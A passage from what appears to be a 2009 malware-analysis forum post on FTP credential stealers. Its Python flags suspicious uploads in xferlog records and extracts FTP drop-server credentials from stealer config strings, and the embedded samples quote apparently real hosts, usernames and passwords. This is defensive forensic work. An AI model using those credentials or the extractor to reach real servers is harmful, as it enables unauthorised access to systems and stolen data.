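Tue Jul 28 03:17:45 2009 0 76.204.151.233 17324 /home/fusionpa/public_html/archive/index.php a _ o r jaycrilla@fusionpassez.com ftp 1 * c
Tue Jul 28 04:07:41 2009 1 94.23.114.104 11115 /home/fusionpa/public_html/includes/visionscripts/psionic_hide/global_start.php a _ i r fusionpa ftp 1 * c
""".splitlines()

if __name__ == "__main__":
    result = analyse(SAMPLE_XFERLOG)
    for host, path in result["drop_pickups"]:
        print(f"drop-file pickup  {host}  {path}")
    for host, user, path in result["php_uploads"]:
        print(f"php upload        {host}  {user}  {path}")
    print(result["by_host"])
```

On the four sample records the pickups come from one host (124.190.93.163, the operator collecting logs), the web-root PHP upload is the 94.23.114.104 transfer into psionic_hide, and the forum-owner downloads from 76.204.151.233 are left alone. Pointing analyse() at a real xferlog only requires reading the file into lines.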

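The two config strings quoted above (the "-:-"-delimited [Daten] block from the LiteStealer and the "@@NN@@"-delimited one from Temp\2.exe) both carry host, user and password as adjacent fields. As an added example (written for this page, not the poster's tooling), this extractor scans a binary for printable ASCII and UTF-16LE runs, splits any run containing one of those delimiters, and takes the first hostname-like field followed by two non-empty fields as host, user and password. The delimiter list, the field-position heuristic and the sample "binary" (the two quoted strings plus the quoted error-message line, padded with filler bytes) are this example's assumptions.

```python
"""Extract FTP drop credentials from delimited config strings in stealer
binaries (added example; delimiters and field heuristic are assumptions)."""
import re
from typing import Dict, Iterator, List, Optional

DELIMITERS = ("-:-", "@@NN@@")   # the two separators seen in the quoted strings
MIN_LEN = 8                        # minimum printable run, as in strings(1) -n 8
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)
HOSTLIKE = re.compile(r"^(?:\d{1,3}(?:\.\d{1,3}){3}|[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)$")


def iter_strings(data: bytes) -> Iterator[str]:
    """Printable ASCII runs, then UTF-16LE runs (VB6 and .NET store literals as UTF-16)."""
    for m in ASCII_RUN.finditer(data):
        yield m.group().decode("ascii")
    for m in UTF16_RUN.finditer(data):
        yield m.group().decode("utf-16-le")


def creds_from_string(s: str) -> Optional[Dict[str, object]]:
    """Split on a known delimiter; the first hostname/IP-looking field that is
    followed by two non-empty fields is taken as host, user, password."""
    for delim in DELIMITERS:
        if s.count(delim) < 3:
            continue
        fields = s.split(delim)
        for i in range(len(fields) - 2):
            if HOSTLIKE.match(fields[i]) and fields[i + 1] and fields[i + 2]:
                return {"delimiter": delim, "host": fields[i], "user": fields[i + 1],
                        "password": fields[i + 2], "fields": fields}
    return None


def extract(data: bytes) -> List[Dict[str, object]]:
    """All distinct (host, user) credential sets found in a binary blob."""
    seen, found = set(), []
    for s in iter_strings(data):
        c = creds_from_string(s)
        if c and (c["host"], c["user"]) not in seen:
            seen.add((c["host"], c["user"]))
            found.append(c)
    return found


# Constructed stand-in for a stealer .exe: filler bytes around the strings
# quoted in the post (the two configs plus the LiteStealer error-message line).
SAMPLE_BINARY = (
    b"MZ\x90\x00" + bytes(range(64))
    + b"Scene-CoderZ LS c0ded by w0red!\x00"
    + b"1-:-Files9.cyberlynk.net-:-viclogs-:-viclogs-:--:-\x00"
    + b"0-:-Error 42342-:-An Error occured. The program must be closed!-:-Normal-:-0-:-0-:-g34tg3gerrgfbv-:--:-1-:-\x00"
    + bytes(range(128, 256))
    + "@@NN@@ftp.drivehq.com@@NN@@ghyll@@NN@@lancej@@NN@@10@@NN@@My Music@@NN@@true@@NN@@false|@@NN@@false@@NN@@active".encode("utf-16-le")
    + b"\x00\x00"
)

if __name__ == "__main__":
    for c in extract(SAMPLE_BINARY):
        print(f"{c['host']}  user={c['user']}  password={c['password']}  ({c['delimiter']})")
```

The error-message line is split like the others but yields nothing, because none of its fields looks like a host; the full field list is kept in the result so that positional extras (the "My Music" remote directory in the drivehq string, for instance) can be read off by hand. Run it against a real sample by passing the file's bytes to extract().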
Vektor, 2009-09-12 17:02:44